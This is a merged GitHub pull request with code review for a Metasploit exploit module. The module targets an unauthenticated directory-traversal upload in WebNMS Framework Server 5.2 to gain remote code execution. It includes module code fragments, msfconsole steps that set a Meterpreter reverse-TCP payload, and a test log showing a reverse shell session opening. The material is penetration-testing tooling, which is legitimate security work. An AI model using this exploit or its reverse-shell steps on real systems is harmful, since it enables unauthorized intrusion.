### PR TITLE
Create exploit for WebNMS 5.2 RCE

### PR DESCRIPTION
**Pull request by pedrib**
This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an
unauthenticated user to upload text files by using a directory traversal attack
on the FileUploadServlet servlet. A JSP file can be uploaded that then drops and
executes a malicious payload, achieving code execution under the user which the
WebNMS server is running.
This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on
Windows and Linux.

Download link:
https://www.webnms.com/telecom/download-professional.html

### CODE REVIEW

**Comment by bwatters-r7** [comment]
# Testing
### Win7Prox64 and WebNMS 5.2
- [ ] start msfconsole
- [ ] ```use exploit/multi/http/webnms_file_upload```
- [ ] ```set rhost <target_IP>```
- [ ] ```set payload windows/meterpreter/reverse_tcp```
- [ ] ```set lhost <msf_IP>```
- [ ] ```set lport 4545```
- [ ] ```run```

File: modules/exploits/multi/http/webnms_file_upload.rb [hunk 1]
```diff
@@ -0,0 +1,224 @@
...
+    } catch (Exception e) {
+    }
+    %>
+    |
+
+    jsp = jsp.gsub(/\n/, '')
+    jsp = jsp.gsub(/\t/, '')
+    jsp = jsp.gsub(/\x0d\x0a/, "")
+    jsp = jsp.gsub(/\x0a/, "")
+
```
Comment (bwatters-r7) [inline modules/exploits/multi/http/webnms_file_upload.rb]: Credit to where it is due; @wvu-r7 asked me why you were removing "\n" and "\x0a"  I'm curious, too:
```
2.3.1 :003 > "\n\n\n".gsub(/\n/, '')
 => "" 
2.3.1 :004 > "\n\n\n".gsub(/\x0a/, '')
 => "" 
```
Not sure exactly how Ruby deals with unicode, but that seems strange.

Comment (pedrib) [inline modules/exploits/multi/http/webnms_file_upload.rb]: To be honest I'm not sure if it makes a difference. I usually copy paste code from earlier modules I've released...

Comment (wvu-r7) [inline modules/exploits/multi/http/webnms_file_upload.rb]: I ended up with something like ```jsp.delete!("\t\r\n")```.

File: modules/exploits/multi/http/webnms_file_upload.rb [hunk 2]
```diff
@@ -0,0 +1,222 @@
...
+            ]
+          ],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Jul 4 2016'
+      )
+    )
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 9090]),
```
Comment (wvu-r7) [inline modules/exploits/multi/http/webnms_file_upload.rb]: ```Opt::RPORT(9090)``` here.

File: modules/exploits/multi/http/webnms_file_upload.rb [hunk 3]
```diff
@@ -0,0 +1,222 @@
...
+        OptString.new('TARGETURI', [ true, "WebNMS path", '/'])
+      ],
+      self.class
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'    => normalize_uri(datastore['TARGETURI'], 'servlets', 'FileUploadServlet'),
```
Comment (wvu-r7) [inline modules/exploits/multi/http/webnms_file_upload.rb]: Use ```target_uri.path```.

**Comment by pedrib** [comment]
Changed as requested!

**Comment by wvu-r7** [comment]
Aww, you missed some ```target_uri.path``` changes. :P

**Comment by pedrib** [comment]
@wvu-r7 "some" - must have been asleep at the wheel

@bwatters-r7 this is good to go!

**Comment by bwatters-r7** [comment]
@pedrib @wvu-r7 Great!  I'll try and get this out today.

**Comment by bwatters-r7** [comment]
# Test Run:
```
bwatters@ubuntu:~/rapid7/metasploit-framework$ ./msfconsole -q
msf > use exploit/multi/http/webnms_file_upload 
msf exploit(webnms_file_upload) > set rhost <target_IP>
rhost => <target_IP>
msf exploit(webnms_file_upload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(webnms_file_upload) > set lhost <msf_IP>
lhost => <msf_IP>
msf exploit(webnms_file_upload) > set lport 12345
lport => 12345
msf exploit(webnms_file_upload) > run

[*] Started reverse TCP handler on <msf_IP>:12345 
[*] <target_IP>:9090 - Determining target
[*] <target_IP>:9090 - Selected target WebNMS Framework Server 5.2 / 5.2 SP1 - Windows
[*] <target_IP>:9090 - Uploading payload...
[*] <target_IP>:9090 - Payload uploaded successfully
[*] <target_IP>:9090 - Executing payload...
[*] Sending stage (957999 bytes) to <target_IP>
[*] Meterpreter session 1 opened (<msf_IP>:12345 -> <target_IP>:49615) at 2016-08-10 13:10:53 -0700
[!] This exploit may require manual cleanup of 'jsp/WebStart-lRW.jsp' on the target
[!] This exploit may require manual cleanup of 'jsp/WebStart-pxQ.jsp' on the target

meterpreter > sysinfo
Computer        : WIN-CMLEMCUFOB2
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] <target_IP> - Meterpreter session 1 closed.  Reason: User exit
msf exploit(webnms_file_upload) > set rport 445
rport => 445
msf exploit(webnms_file_upload) > run

[*] Started reverse TCP handler on <msf_IP>:12345 
[*] <target_IP>:445 - Determining target
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf exploit(webnms_file_upload) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(webnms_file_upload) > run

[*] Started reverse TCP handler on <msf_IP>:12345 
[*] 1.1.1.1:445 - Determining target
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (1.1.1.1:445).
[*] Exploit completed, but no session was created.
msf exploit(webnms_file_upload) > 
```

**Comment by bwatters-r7** [comment]
Merged; Thanks again, @pedrib!

**Comment by bwatters-r7** [comment]
Stolen gratuitously from @pedrib:

# Release Notes
This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an
unauthenticated user to upload text files by using a directory traversal attack
on the FileUploadServlet servlet. A JSP file can be uploaded that then drops and
executes a malicious payload, achieving code execution under the user which the
WebNMS server is running.
This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on
Windows and Linux.

**Pull request merged**